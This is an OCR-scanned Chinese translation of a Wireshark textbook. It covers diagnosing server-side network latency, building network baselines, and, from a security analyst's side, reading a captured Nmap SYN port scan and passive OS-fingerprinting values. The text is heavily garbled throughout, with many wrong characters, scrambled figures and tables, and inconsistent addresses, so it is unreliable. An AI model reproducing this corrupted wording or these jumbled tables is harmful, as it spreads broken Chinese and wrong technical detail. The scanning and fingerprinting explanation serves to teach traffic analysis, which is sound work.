执行 该 动作 。 这 意味 看 通信 高 延迟 的 根源 在 于 各 户 病 。 


11.4.4 通信 绥 慢 一 一 服务 磊 延 迟 


我 们 答 看 的 最 后 一 个 延迟 情景 使 用 了 latency4.pcap 文 件 ， 如 图 11-25 
所 示 。 这 和 古 服 务 硕 延 返 的 一 个 例子 。 





图 11-25 直到 最 后 一 个 数据 包 才 表现 出 高 延迟 


在 这 个 捕获 记录 中 ， 两 全 主机 则 的 TCP 握 手 过 程 很 快 束 顺利 完成 
了 ， 这 是 个 很 好 的 开端 。 下 一 对 数据 包 市 来 了 更 好 的 消 居 ， 初 始 GET 请 
求 和 啊 应 的 ACK 数 据 包 也 很 快 传输 完毕 。 和 下 到 最 后 一 个 数据 包 ， 我 们 才 
及 现 了 局 延 开 的 迹象 。 


第 6 个 数据 包 是 服务 器 啊 应 客户 端 GET 请 求 的 第 一 个 HITP 数 据 包 ， 
但 它 竟然 在 服务 器 为 GET 请 求 发 送 TCP ACK 之 后 延迟 了 0.98s。 数 据 包 5 
到 6 的 切换 情况 与 我 们 在 上 一 个 情景 中 看 见 的 握手 ACK 与 GET 请 求 之 间 
的 切换 很 相似 。 然 而 ， 在 这 个 例子 中 ， 服 务 占 才 是 我 们 关注 的 焦点 。 


数据 包 5 是 服务 器 响应 客户 端 GET 请 求 的 ACK。 一 旦 发 送 这 个 数据 
包 ， 服 务 器 就 应 该 立即 开始 友 送 数据 。 这 个 数据 包 中 的 数据 访问 、 打 包 
和 传输 是 由 HTTP 协 议 完 成 的 ， 由 于 这 是 一 个 应 用 层 协议 ， 因 此 需要 服 
务 器 作 一 些 处 理 。 延 迟 收 到 这 个 数据 包 表 明 服 务 器 不 能 及 时 处 理 这 个 数 
据 ， 最 终 把 延迟 的 根源 指向 了 它 。 


11.4.5 ”延迟 定位 框架 


我 们 使 用 6 个 数据 包 成 功 地 定位 了 从 客户 端 到 服务 器 的 网 络 高 延迟 
的 原因 。 这 些 场景 看 起 来 也 许 有 点 复杂 ， 但 图 11-26 应 该 能 帮 你 更 快 地 
解雇 延迟 问题 。 这 些 原 则 几乎 可 应 用 于 任何 基于 TCP 的 通信 。 








我 们 还 没有 讨论 UDP 延 人 运 。 因 为 UDP 的 设计 目标 是 快速 但 不 可 徘 ， 所 以 它 没 有 内 力 任 何 
延迟 检测 并 从 中 恢复 的 功能 。 相 反 ， 它 依赖 于 应 用 层 协 议 ( 和 ICMP) 来 解决 数据 可 菲 传输 


的 问题 。 





局 











客户 端 NO 服务 端 
到 SYN/ACK 
ACK 一 人 
2 一 一 一 一 第 7 层 协 议 请 求 ” 一 一 一 > 
到 ACK 
[3 第 7 层 协议 数据 
天 线路 延迟 


2| 客户 端 延迟 
| 3 | 服务 端 延 迟 





图 11-26 ”你 可 以 用 这 张 图 解决 目 己 的 延迟 问题 
11.5 ”网络 基线 


当 所 有 的 努力 部 失败 时 ， 网 络 基线 将 成 为 检修 网 络 组 慢 故 障 最 关键 
的 数据 之 一 。 对 我 们 的 目的 而 言 ， 网 络 基线 包含 来 日 网 络 不 同 问 点 的 流 
量 样本 ， 包 括 大 量 我 们 认可 的 “正常 ”网 络 流量 。 网 络 基线 的 作用 是 在 网 


络 或 设备 工作 不 正和 时 作为 比较 的 基准 。 


例如 ， 考 虑 一 个 场景 ， 网 络 上 几 个 客 尸 反映 登录 条 个 本 地 Web 应 用 
服务 器 时 反应 返 钝 。 如 果 你 捕获 这 些 沉 量 并 与 网 络 基 线 对 照 ， 束 会 友 现 
Web 服 务 器 一 切 正常 ， 但 艇 入 到 Web 应 用 中 的 外 部 内 容 引 发 了 额外 的 外 
部 DNS 请 求 ， 而 这 些 请 求 比 正常 速度 慢 两 僧 。 


也 许 不 靠 网 络 基线 的 帮助 ， 你 也 能 注意 到 异常 的 外 部 DNS 服 务 器 ， 
但 当 你 处 理 微 妙 的 变化 时 ， 束 不 一 定 了 。10 个 DNS 请 求 都 比 正 沿 情况 多 
耗费 0.1s， 这 跟 一 个 DNS 请 求 比 正 党 多 耗费 1s 一 样 糟糕 ， 但 没有 网 络 基 
线 的 话 ， 检 测 前 者 要 难得 多 。 


由 于 网 络 各 不 相同 ， 因 此 网 络 基线 的 组 件 将 有 很 大 弄 弄 。 接 下 来 的 
儿 市 提供 了 网 络 基 线 组 件 的 几 个 例子 。 你 也 许 会 友 现 所 有 这 些 条 目 部 能 
应 用 到 你 的 网 络 基础 说 苑 ， 或 上 只 是 很 少 一 部 分 能 适用 。 不 官 怎 梓 ， 你 应 
该 把 你 的 基线 中 的 每 一 个 组 件 置 入 这 3 个 基本 基线 目录 中 : 站 点 、 主 机 
和 应 用 程序 。 


11.5.1 站 点 基线 


站 所 基线 的 目的 是 获得 网 络 上 每 个 物理 冰点 的 整体 流量 快照 。 理 想 
情况 下 ， 这 将 是 WAN 内 的 每 一 个 段 。 


这 个 基线 应 该 包含 以 下 几 个 组 件 。 
1. 使 用 的 协议 


在 网 络 边 绿 (路 由 融 / 防 火 墙 ) 捕获 网 段 上 所 有 人 设备 的 流量 时 ， 请 
使 用 协议 分 层 统计 窗口 〈Statistics->Protocol Hierarchy ) 来 查看 所 有 设 
备 的 流量 。 然 后 ， 你 可 以 对 照 租 看 是 售 缺 少 本 应 出 现 的 协议 ， 或 者 网 络 
上 是 个 出 现 了 新 的 协议 。 你 也 可 以 在 协议 的 基础 上 ， 用 乞 来 及 现 高 于 正 
第 数量 的 特定 类 型 的 流量 。 


2. 广播 流量 


这 包含 网 段 上 的 一 切 广 播 流 量 。 在 站 点 内 任 一 点 监听 都 可 以 捕获 所 
有 广播 流量 ， 退 过 它 可 以 了 解 正常 情况 下 谁 将 大 量 广播 流量 友 达 到 网 络 
中 ， 这 样 你 将 很 快 确定 是 侣 出 现 了 过 多 《或 过 少 ) 的 广播 流量 。 


3. 刁 份 验证 序列 


这 包括 任意 客户 疾 到 所有 服务 的 里 份 验 证 过 往 的 流量 ， 比 如 动态 目 
录 、Web 应 用 程序 ， 以 及 特定 组 织 的 软件 。 和 里 份 验证 人 退 闸 十 服务 运行 绥 
恤 的 一 个 方面 。 通 过 基线 你 可 以 确定 且 份 验证 是 合 是 通信 缓 怪 的 原因 。 


4. 数据 传输 座 


这 退 第 包括 在 网 络 上 讽 量 这 个 站 后 a 到 其 他 站 点 的 大 量 数 据 传输 。 你 
可 以 使 用 Wireshark 的 捕获 概述 和 绘图 功能 来 确定 传输 速率 和 连接 的 一 至 
性 。 这 可 能 是 你 的 一 个 很 重要 有 的 站 点 基线 。 每 当 在 网 段 上 建立 或 拆除 连 
接 速 度 很 慑 时 ， 你 融 可 以 运行 与 基 线 同 样 的 数据 传输 并 比较 结束 。 这 会 
告诉 你 连接 是 侣 真 的 很 居 ， 甚 至 可 能 带 助 你 查找 缓慢 的 原因 。 


11.5.2 主机 基线 


使 用 主机 基线 并 不 意味 着 你 必须 要 在 网 络 上 测试 每 台 主机 。 主 机 基 
线 只 需要 在 高 流量 或 关键 任务 服务 器 上 执行 。 基 本 上 ， 一 旦 某 台 服务 器 
运行 缓慢 ， 便 会 招来 管理 层 愤怒 的 电话 ， 你 应 当 在 那 台 主机 上 建立 基 


O 〇 


主机 基线 包含 以 下 儿 个 组 件 。 
1. 使 用 的 协议 


当 捕 获 这 人 台 主 机 的 流量 时 ， 这 个 基线 提供 了 使 用 协议 分 层 统计 窗口 
的 好 机 会 。 然 后 ， 你 可 以 对 照看 一 看 是 个 缺少 本 应 出 现 的 协议 ， 或 者 主 
机 上 古谷 出 现 了 新 的 协议 。 你 也 可 以 在 协议 的 基础 上 ， 用 它 来 友 现 局 于 
下 第 数量 的 特定 类 型 的 流量 。 


2.， 和 衬 朵 / 票 忙 演 量 


这 个 基线 只 是 简单 包含 了 融 峰 和 非 高 峰 时 段 正 向 操作 流星 的 总 体 捕 
获 记 录 。 了 解 到 一 天 之 中 不 同时 段 的 连接 数量 及 其 后 用 的 市 宽大 小 ， 有 
助 于 你 确定 缓慢 是 用 户 负 载 还 是 其 他 原因 造成 的 。 


3， 启 动 /关闭 
为 了 获取 这 个 基线 ， 你 需要 在 主机 局 动 和 关闭 时 创建 一 个 流量 捕获 


记录 。 一 旦 计算 机 不 能 局 动 、 不 能 关闭， 或 这 两 个 过 程 异 沼 绥 慢 ， 你 束 
可 以 使 用 它 确认 问题 是 否 跟 网 络 有 天 。 


4. 刁 份 验证 序列 


这 个 基线 要 求 在 主机 上 捕获 所 有 服务 的 身份 验证 过 程 的 流量 。 身 份 
验证 通常 是 服务 运行 缓慢 的 一 个 方面 。 通 过 基线 你 可 以 确认 身份 验证 是 
否 是 通信 缓慢 的 原因 。 


5. 关联 /依赖 


这 个 基线 需要 持续 更 长 时 间 的 捕获 ， 以 确定 这 台 主 机 依赖 于 哪些 主 
机 (以 及 哪些 主机 依赖 于 这 台 主 机 〉 。 你 可 以 通过 会 话 窗 口 (Statistics- 
>Conversations) 但 看 这 些 关 联 和 依赖 。Web 服 务 妖 依赖 于 SQL 服 务 占 
便 是 这 样 的 例子 。 有 了 时 我 们 会 意识 不 到 主机 间 的 一 些 潜在 依赖 天 系 ， 这 
时 主机 基线 便 能 派 上 有 用场。 通过 这 个 ， 你 可 以 确定 主机 不 能 正常 运转 ， 
是 因为 配置 错误 还 是 因为 所 依赖 主机 的 高 延迟 。 


11.5.3 ”应 用 程序 基线 


最 后 一 个 网 络 基 线 类 别 是 应 用 程序 基线 。 这 个 基线 应 该 用 于 所 有 其 
于 网 络 的 关键 业务 应 用 程序 。 


应 用 程序 基线 包含 以 下 几 个 组 件 。 


1. 使 用 的 协议 


我 们 在 这 个 基线 中 再 次 使 用 了 Wireshark 的 协议 分 层 统计 窗口 ， 但 这 
次 是 在 运行 应 用 程序 的 主机 上 捕获 流量 。 然 后 ， 你 可 以 通过 比较 这 个 列 
表 ， 友 现 依赖 于 这 些 协议 的 应 用 程序 是 任 正 第 运转 。 


2.， 启动 /关闭 


这 个 基线 需要 捕获 应 用 程序 启动 和 关闭 时 生成 的 流量 。 一 旦 应 用 程 
序 不 能 启动 、 不 能 关闭 ， 或 这 两 个 过 程 都 异常 缓慢 ， 你 就 可 以 使 用 它 确 
定 原因 。 


3. 关联 /依赖 


这 个 基线 需要 持续 更 久 的 捕获 ， 以 通过 会 话 窗口 确定 这 个 应 用 程序 
依赖 的 其 他 主机 和 应 用 程序 。 有 时 我 们 会 意识 不 到 应 用 程序 间 的 一 些 潜 
在 依赖 天 系 ， 这 时 应 用 程序 基线 便 能 小 上 用 场 。 通 过 这 个 ， 你 可 以 确定 
应 用 程序 不 能 正 第 运转 ， 征 因为 配置 错误 还 是 因为 所 依赖 应 用 程序 的 高 
延迟 。 


4， 数 据 传输 率 
你 可 以 在 应 用 程序 服务 右上 正常 运转 期 间 ， 使 用 Wireshark 的 捕获 概述 
和 绘 独 功能 确定 数据 传输 雍和 连接 一 致 性 。 每 当 有 人 报告 应 用 程序 缓慢 


时 ， 你 束 可 以 使 用 这 个 基线 来 确定 当前 问题 是 含 是 局 利用 率 或 高 用 户 负 
载运 成 的 。 


11.5.4 基线 的 其 他 注意 事项 
下 面 是 创建 网 络 基 线 的 一 些 额外 注意 事项 。 


。 创 建 每 个 基线 都 至 少 要 经 过 3 次 : 低 流量 期 间 一 次 〈 早 晨 ) 、 高 流 
量 期 间 一 次 (下 午 三 点 左右 、 无 流量 期 间 一 次 〈 深 夜 ) 。 


。 有 可 能 的 话 ， 尽 量 避 免 百 接 在 需要 创建 基线 的 主机 上 捕获 流量 。 
为 在 局 流量 期 间 ， 这 可 能 会 增加 设备 负载 和 影响 性 能 ， 并 可 能 因数 
据 包 丢 矢 寻 致 基线 无 效 。 

。 你 的 基线 可 能 包含 一 些 与 网 络 有 天 的 私密 信息 ， 一 定 要 你 护 好 它 。 
将 它 和 存储 在 安全 的 地 方 ， 只 有 合适 的 人 才 有 有 访问 权限 。 但 同时 列 帮 
ee 以 免责 要 时 找 不 到 。 可 以 考虑 将 它 存 放 在 U 熏 或 者 加 密 分 
广 里 。 

。 让 所 有 .pcap 文 件 与 你 的 基线 关联 ， 为 更 利 见 的 参考 值 写 一 份 “小 
抄 ”"， 比 如 关联 关系 或 数据 传输 率 。 


11.6 ”小结 


本 章 内 容 聚 焦 于 如 何 解决 慢 速 网 络 的 问题 。 我 们 讲述 了 TCP 有 的 一 些 
有 用 的 可 和 菲 性 检测 和 恢复 功能 ， 误 示 了 如 何 定位 网 络 通信 高 延 开 的 原 
因 ， 并 讨论 了 网 络 基线 的 重要 性 以 及 它 的 一 坚 组 件 。 使 用 这 里 讨论 的 拉 
术 ， 再 加 上 Wireshark 的 绘图 和 分 析 巧 能 《在 第 5 草 讨 论 过 ) ， 当 你 册 接 
到 电话 抱 忽 网 速 很 慢 时 ， 应 该 能 应 付 目 如 。 


第 12 划 ”安全 领域 的 数据 包 分 析 





里 然 本 书 主要 集中 于 如 何 使 用 数据 包 分 析 拉 术 解 决 网 络 故 障 ， 但 在 
现实 世界 中 ， 很 多 数据 包 分 析 工 作者 是 为 了 解决 安全 问题 。 当 入 侵 分 析 
师 检 查 来 目 可 疑 人 侵 痢 的 网 络 流量 ， 或 取证 人 员 调 查 亚 意 软件 在 主机 上 
的 感染 程度 时 ， 束 会 用 到 数据 包 分 析 的 方法 。 面 同安 全 的 数据 包 分 析 古 
一 个 很 六 的 话题 ， 都 可 以 万 写 一 本 书 了 了， 本 章 只 是 市 你 答 答 鲜 。 


在 本 章 ， 我 们 将 扮演 一 位 安全 从 业者 ， 学 习 在 网 络 层 分 析 “ 肉 鸡 ” 
系统 的 各 个 方面 。 我 们 将 涉及 网 络 侦察 、 亚 意 的 流量 重 定 同 ， 以 及 系统 
漏 润 利用。 接 痢 ， 我 们 将 扮 狂 一 位 入 侵 分 析 师 ， 齐 析 来 目 入 侵 检测 系统 
的 警报 流量 。 即 使 你 不 是 安全 从 业者 ， 通 过 阅读 本 和 章 ， 你 也 可 以 获得 一 
些 对 网 络 安 全 的 天 键 洞 察 。 


12.1 网 络 侦察 


攻击 者 采取 的 第 一 步行 动 是 深入 研究 目标 系统 。 这 一 步 又 叫 “ 网 络 
中 点”， 通 钊 使 用 各 陈 各 样 的 公开 资源 来 完成 ， 比 如 目标 公司 的 主页 或 
者 Google。 这 个 研究 完成 后 ， 攻 击 者 退 弟 开始 扫 插 目标 IP 地 址 (或 者 域 
名 ) 的 开放 器 口 或 运行 服务 。 


通过 扫 摘 ， 攻 击 者 可 以 确定 目标 是 个 在 线 并 且 可 达 。 例 如， 想象 一 
下 ,一 位 银行 大 次 四 上 了 位 于 幼 因 街 123 号 的 目标 一 一 本 市 规模 很 大 的 
银行 。 他 伦 旨 数 星期 时 间 精 心 策划 此 砍 抢 动 ， 却 在 抵达 目的 地 后 才 友 现 
银行 已 经 搬迁 到 了 万 安 街 555 号 。 还 可 以 想象 一 个 更 糖 糙 的 场景 ， 支 菲 
计划 在 正 第 上 班 时 间 步 行进 入 银行 ， 以 便 对 金库 下 手 ， 刚 a 到 银行 门口 却 





及 现今 天 鞭 业 。 确 你 目标 在 线 并 且 可 达 是 我 们 必须 要 解 次 的 一 个 问题 。 


扫描 的 另 一 个 重要 收获 是 ， 它 告诉 了 攻击 者 目标 开放 了 哪些 端口 。 
回 到 我 们 刚才 类 比 的 银行 动 大 ， 想 一 想 ， 如 果 劫 庆 出 现在 银行 门口 ， 却 
对 整 幅 楼 的 布局 一 无 所 知 ， 会 怎么 样 ? 他 无 法 进入 大 楼 ， 因 为 他 不 知道 
物理 防御 的 弱点 在 哪里 。 


在 本 市 中 ， 我 们 会 讨论 如 何 用 一 些 典 型 的 扫 插 技术 识别 主机 和 它们 
开放 的 剖 口 号， 以 及 网 络 上 的 漏洞 。 


BW 





到 目前 为 止 ， 本 书 说 的 “连接 两 应? 禹 是 指 发 送 者 和 接收 者 ， 或 者 客户 顺和 服务 右 。 而 本 
革 提 到 的 “连接 两 端 * 却 是 指 攻击 者 或 受害 者 。 





12.1.1 SYN 扫 描 


首先 对 系统 作 TCP SYN 扫 换 ， 义 称 为 隐秘 扫 插 或 半 开 扫 插 。SYN 扫 
拍 是 一 种 第 见 的 扫 插 类 型 ， 有 以 下 几 个 原因 。 


。 快速 可 菲 。 
。 在 所 有 平台 上 部 很 准确 ， 与 TCP 协 议 栈 的 实现 无 关 。 
。 比 其 他 扫 括 拉 术 更 安 讲 ， 丰 容易 被 友 现 。 


TCP SYN 扫 描 依 赖 于 三 步 握 手 过 程 ， 可 以 确定 目标 主机 的 哪些 端口 
是 开 / 的 。 攻 击 者 发 送 TCP SYN 数 据 包 到 受害 者 的 一 定 范 围 的 端口 上 ， 
就 像 要 在 这 些 端口 上 建立 用 于 正常 通信 的 连接 似 的 。 如 图 12-1 所 示 ， 一 
旦 受害 者 收 到 这 个 数据 包 ， 就 可 能 会 做 出 某 些 啊 应 。 


SN 
| | NA 
二 SYN/ACK— 


一 3SYN/ACK 


攻击 者 开放 80 端 口 的 受害 者 


[一 [| 一 = 
/PEN Ee] 
攻击 者 关闭 80 靖 口 的 受害 者 
|_ 了 
ARRA 
攻击 者 过 滤 80 站 口 的 受害 者 





图 12-1 一 次 TCP SYN 扫 描 的 结 


如 果 受 害 者 机 器 上 某 个 服务 正在 监听 的 端口 收 到 了 SYN 数 据 包 ， 那 
么 它 将 向 攻击 者 回复 一 个 TCP SYN/ACK 数 据 包 ， 也 就 是 TCP 握 手 的 第 
二 部 分 。 这 样 攻击 者 束 能 知道 这 个 端口 是 开放 的 ， 并 且 有 一 个 服务 在 上 
面 监听 。 正 常情 况 下 会 发 送 一 个 TCP ACK 包 以 完成 连接 握手 ， 但 此 刻 攻 
| 因为 他 还 不 想 与 主机 通信 。 上 所以， 攻击 者 并 不 打算 完 
kTCP 握 于 。 


如 果 没 有 服务 在 被 扫描 的 端口 上 监听 ， 那 么 攻击 者 就 收 不 到 
SYN/ACK。 按 照 受 害 者 操作 系统 的 不 同 配置 ， 攻 击 者 可 能 会 收 到 啊 应 
的 RST 数 据 包 ， 表 示 端 口头 闭 了 ， 或 者 ， 攻 击 者 看 不 到 任何 啊 应 。 这 意 
味 着 端口 被 某 个 中 间 设 备 过 滤 了 ， 或 许 是 防火 墙 ， 或 许 是 主机 本 丑 。 男 
一 方面 ， 也 有 可 能 是 因为 啊 应 数据 包 在 传输 过 程 中 丢失 了 。 这 个 结果 通 
第 表明 端口 是 关闭 的 ， 但 说 服 力 并 不 强 。 


捕获 文件 synscan.pcp 提 供 了 用 Nmap 工 具 进 行 SYN 扫 描 的 绝 佳 例 
子 。Nmap 是 Fyodor 创 六 的 一 蒜 稳 定 的 网 络 扫 摘 程 序 。 它 可 以 执行 你 能 
想到 的 任何 一 种 扫描 方式 。 


我 们 捕获 的 样本 大 概 包 售 2000 个 数据 包 ， 说 明 这 种 扫描 有 一 定 的 规 
模 。 确 定 这 个 扫 摘 范围 大 小 的 最 好 办 法 之 一 束 是 否 看 Conversations 窗 


口 ， 如 图 12-2 所 示 。 在 这 里 ， 你 会 看 到 攻击 者 〈172.16.0.8) 和 受害 者 
(63.13.134.52) 之 间 只 有 eoly 会 话 @。 你 也 会 看 人 到， 那里 有 1994 个 
TCP 会 话 人 一 一 通信 基本 上 是 每 一 个 端口 对 应 一 个 新 会 话 。 

















二 Wireshark . Conversations . synscan 口 XX | 
0 2 
Ethernet " 1 IFPv4 1 IFPv6 TCP . 1994 UDP 
Address A PortA AddressB PortB Packets Bytes Packets A—B BytesA—B PacketsB—A BytesB—A RelStart Duration Bits/sA—B Bits/sB 一 A 六 
64,13.134,.52 65000 172,.16.0.8 36030 1 38 0 0 1 38 1.690937000 0.000000 N/A N/A 
64,13.134.52 55000 172,16,0,8 36051 1 58 0 0 1 58 1,820296000 0.000000 N/A N/A 
全 ,13.134.52 52848 172,16.0.8 36050 1 58 0 0 1 58 1,821670000 0.000000 N/A N/A 
64,13,134,52 52848 172,16,0,8 36051 1 58 0 0 1 58 1,945599000 0.000000 N/A N/A 
64,13,134.52 61532 172,16.0.8 36050 1 58 0 0 1 58 1.946839000 0.000000 N/A N/A 
64,13.134.52 49155 172,16.0.8 36050 1 58 0 0 1 58 2.006228000 0.000000 N/A N/A 
64.13.134.52 61532 172.16.0.8 36051 1 58 0 0 1 58 2.070465000 0.000000 N/A N/A 
64.13.134.52 49155 172.16.0.8 36051 1 58 0 0 1 58 2.130300000 “0.000000 N/A N/A 
64,13.134.52 44176 172,.16.0.8 36050 1 58 0 0 1 58 2.196298000 0.000000 N/A N/A 
全 ,13.134.52 49999 172.16.0.8 36030 1 38 0 0 1 38 2,196434000 0.000000 N/A N/A 
64,13.134,52 40911 172,15,0.8 36050 1 58 0 0 1 58 2.255375000 0.000000 N/A N/A v 
[| Name resolution [LL] Limit to display filter 
Copy 了 | IFollow Stream... Graph... Close Help 


图 12-2 “Conversations 窗 口 显示 了 正在 进行 的 TCP 通 信 


扫描 是 在 极 短 时 间 内 完成 的 ， 因 此 在 捕获 文件 上 滚动 鼠标 并 不 是 寻 
找 SYN 数 据 包 啊 应 的 好 共 法 。 在 接收 色 啊 应 之 玉 ， 己 经 安庆 了 更 多 的 
SYN 数 据 包 。 音 好， 我 们 可 以 创建 过 汐 医 ， 来 带 助 我 们 豆 找 正确 的 沈 


里 。 


.在 SYN 扫 手中 使 用 过 小 可 


闪 一 个 贤 选 的 例子 。 让 我 们 看 一 看 第 1 个 数据 包 一 一 发 送 到 受害 者 
443 端 口 (HTTPS) 的 SYN 数 据 包 。 为 了 查看 是 否 有 对 这 个 数据 包 的 响 
应 ， 我 们 可 以 创建 一 个 过 滤器 ， 以 显示 所 有 源 端口 或 目标 端口 为 443 的 
流量 。 下 轴 是 如 何 快速 束 设置 的 方法 。 


(1) 在 捕获 文件 中 选择 第 一 个 数据 包 
(2) 在 Packet Details 面 板 中 展开 TCP 头 部 。 


(3) 右键 单 击 Destination Port 字 段 ， 选 择 Prepare as Filter， 单 击 
9elected 。 


(4) 这 将 在 filter 对 话 框 放置 一 个 过 滤器 ， 针 对 所 有 目标 端口 为 443 
的 数据 包 。 现 在 ， 由 于 我 们 也 需要 源 端 站 为 443 的 数据 包 ， 所 以 点 击 屏 
徐 栅 病 的 filter 住 ， 并 删除 过 滤 囊 的 dst 部 分 。 


结果 过 渡 带 给 出 了 两 个 数据 包 ， 部 是 攻击 者 肥 给 受害 者 有 的 TCP SYN 
数据 包 ， 如 图 12-3 所 示 。 








图 12-3 ”两 次 尝试 用 SYN 数 据 包 建立 连接 


两 个 数据 包 祁 没有 得 到 啊 应 ， 有 可 能 是 因为 啊 应 数据 包 被 党 害 者 主 
机 或 中 间 设 备 过 滤 了 ， 或 者 病 口 是 天 闭 的 。 但 最 终 来 说 ， 对 443 闹 口 的 
扫 持 结 条 征 不 确定 的 。 


我 们 可 以 用 同样 的 技术 来 分 析 其 他 数据 包 ， 看 一 看 有 没有 不 同 的 结 
朱 。 首 和 抑 ， 单 击 过 小 规 劳 边 的 Clear 撤 钮 ， 清 空 之 前 创建 的 过 小 规 。 然 后 
选择 列表 中 的 第 9 个 数据 包 。 这 十 目 标 问 口 为 53 的 SYN 数 据 包 ， 通 帅 与 
DNS 有 天 。 使 用 前 面 担 到 的 方法 ， 创 建 一 个 基于 目标 瘦 口 的 过 滤 徐 ， 并 
删除 dst 部 分 ， 这 样 它 融 应 用 到 所 有 与 TCP 53 病 口 有 关 的 流量 了 。 妆 使 
用 这 个 过 涯 磺 时 ， 你 会 看 见 5 个 数据 包 ， 如 图 12-4 所 示 。 





图 12-4 ”表明 端口 是 开放 的 5 个 数据 包 
第 1 个 是 我 们 在 捕获 之 初 选择 的 SYN 数 据 包 。 第 2 个 则 是 来 自 受 害 者 


的 啊 应 。 这 是 一 个 TCP SYNVACK 数 据 包 一 实施 三 次 握手 时 期 竺 的 吗 
应 。 在 正常 情况 下 ， 下 一 个 数据 包 应 该 是 发 送 初 始 SYN 的 主机 发 送 的 
ACK。 然 而， 在 这 个 例子 中 ， 攻 击 者 并 不 想 建 并 连接， 因而 没有 发 送 啊 
应 。 受 害 者 重 传 了 3 次 SYN/ACK 包 才 放 弃 。 由 于 壬 试 与 主机 的 53 病 口 通 
信 时 收 到 了 SYINVACK 啊 应 ， 因 此 我 们 可 以 确定 有 一 个 服务 在 监听 该 端 
口 。 





让 我 们 在 数据 包 13 上 再 次 重复 此 过 程 。 这 是 一 个 目标 端口 为 113 的 
SYN 数 据 包 ， 通 第 与 Ident 协 议 有 关 ， 此 协议 常用 于 IRC 的 身份 识别 和 验 
证 服务 。 如 果 你 在 这 个 数据 包 上 使 用 同一 类 型 的 过 滤 右 ， 束 会 发 现 4 个 
数据 包 ， 如 图 12-5 所 示 。 


14 @.861491] 64.13.134.52 172.16.0.8 113 3 360598 [RST, ACK] Seq=2462244745 Ack=3713172249 Win=8 Len= 





S71 @.080827 64.13.134.52 172.16.0.8 113 3 36061 [RST, ACK] Seq=1627849353 Ack=3696394777 Win=8 Len=@ 


图 12-5 SYN 之 后 紧 随 一 个 RST， 表 明 端 口 是 关 闭 的 


第 1 个 数据 包 是 初 冶 SYN， 案 接 看 是 来 目 受 害 者 的 RST。 这 是 受害 
者 目标 疾 口 个 接受 连接 的 迹象 ， 表 明 很 可 能 没有 服务 运行 在 上 面 。 


2. 识 列 开放 和 关闭 的 病 口 


理解 了 SYN 扫 摘 能 引起 的 不 同 啊 应 类 型 后 ， 目 然而 然 会 想到 去 找 一 
个 方法 一 一 如 何 快 速 识 别 哪些 闪 口 是 开放 的 还 是 关闭 的 。 答 案 再 次 洛 到 
了 Conversations 窗 口内 。 在 这 个 窗口 中 ， 你 可 以 通过 数据 包 数 量 排序 
单 击 Packets 列 直到 箭头 回 下 束 可 以 让 最 高 值 千 前， 如 图 12-6 
外。 


顾 Wireshark . Conversations . synscan 


Ethernet * 1 IPv4 :1 IPv6 TCP * 1994 UDP 
portA AddressB PortB packets Bytes Packets A—B BytesA—B PacketsB—A BytesB—A RelStart Duration Bits/sA—B Bit: 人 人 
36050 64.13.134.52 53 298 240 0.001913000 21.091302 
36030 64,13,134,52 


5 
5 240 0.129000000 21.272180 
36050 64,13,134,52 2 3 
2 
2 


240 1.403484000 21.681859 


36050 64,13,134,52 60 0.065341000 0.061491 


360350 64.13,134,52 
36050 64.13.134.52 337 

36061 64.13.134.52 

2.16.0. 36050 64.13.134.52 
64.13.134.52 65000 172.16.0.8 36050 
64.13,.134,52 65000 172,165,0,8 36051 
64.13.134.52 52848 172.16.0.8 36050 


60 1.403154000 0.062745 
60 1.756214000 0.062293 
60 3.070317000 0.061814 
60 4.016755000 0.061231 
38 1.690937000 0.000000 
38 1.820296000 0.000000 
38 1.821670000 0.000000 





hb mh hh hh hh 


1 
1 
1 
1 
1 
1 
1 
1 
0 
0 
0 





[OD Limit to display filter 





图 12-6 ”用 Conversations 窗 口 寻找 开放 病 口 


3 个 被 扫 摘 的 端口 在 各 目 会 话 中 包含 5 个 数据 包 @。 我们 知道 53、80 
和 22 端 口 是 开 放 的 ， 因 为 这 5 个 数据 包 表 示 初 始 SYN、 来 日 受害 者 的 
SYN/ACK 及 其 3 次 重 传 。 


有 5 个 端口 的 通信 只 包含 2 个 数据 包 信 。 第 1 个 是 初始 SYN， 第 2 个 古 
来 自 受 害 者 的 RST。 这 表明 113、25、31337、113 和 70 端 口 是 关 闭 的 。 


Conversations 窗 口 剩 下 的 项 只 包含 1 个 数据 包 ， 意 味 痢 有 党 害 者 主机 


并 没有 啊 应 初始 SYN 包 。 剩 下 的 这 些 问 口 很 可 能 是 关闭 的 ， 但 我 们 不 能 
确定 。 


12.1.2 操作 系统 指纹 


了 解 目标 的 操作 系统 对 攻击 者 有 极 大 价值 。 了 解 到 目标 使 用 的 操作 
系统 ， 将 确保 攻击 者 实施 具有 针对 性 的 攻击 手段 。 同 时 这 个 信息 也 有 助 
于 攻击 者 成 功 进入 系统 后 ， 在 目标 文件 系统 找到 关键 文件 和 目录 。 


“操作 系统 指纹 术 ? 是 指 在 没有 物理 接触 的 情况 下 ， 用 来 确定 机 器 运 
行 的 操作 系统 的 一 组 技术 ， 操 作 系统 指纹 术 分 为 两 各 类型， 被动 式 和 
ZJINo 


1， 航 动 式 指纹 拉 术 


被 动 式 指纹 技术 通过 分 析 目 标 发 送 的 数据 包 的 某 些 字段 来 确定 目标 
使 用 的 操作 系统 。 这 项 技术 之 所 以 称 为 "被动 ”， 是 因为 你 只 监听 目标 主 
机 发 送 的 数据 包 ， 但 并 不 主动 癌 目 标 发 送 任何 流量 。 对 黑客 来 说 ， 这 是 
理想 的 操作 系统 指纹 技术 ， 因 为 它 非 背 隐 蔽 。 

也 就 是 说 ， 我 们 只 需要 基于 目标 主机 发 送 的 数据 包 ， 就 能 确定 它 用 
的 是 哪 一 种 操作 系统 了 ? 咖 ， 这 其 实 非常 容易 。 由 于 RFC 文 件 定 义 的 协 
议 并 未 规定 全 部 技术 参数 的 值 ， 这 完全 是 有 可 能 的 。 虽 然 TCP、UDP 和 
IP 头 部 的 各 个 字段 都 有 特定 含义 ， 但 并 没有 定义 这 些 字 段 的 默认 值 。 这 
意味 着 不 同 操作 系统 实现 的 TCP/P 协 议 栈 都 必须 为 这 些 字段 定义 它 自 己 
iu 


表 12-1 管见 的 被 动 式 指纹 值 


ee 
Zz 





IP 不 分 片 标 | Set BSD、Mac OS 10、Linux、Novell、Windows、Palm 
站 OS、Solaris 


Nmap、 Clsco 1OS 


“cp | 最 长 段 大 


Windows、Novell 


Mac OS 10、 Linux、 Solaris 


5840 


' 


Linux、 Windows、OpenBSD 


pA 





- 小 

一 

时 NJ 
Co 


TCP SackOK 


Nmap、 FreeBSD、 Mac OS 10、Novell、Cisco IOS、 
Solaris 





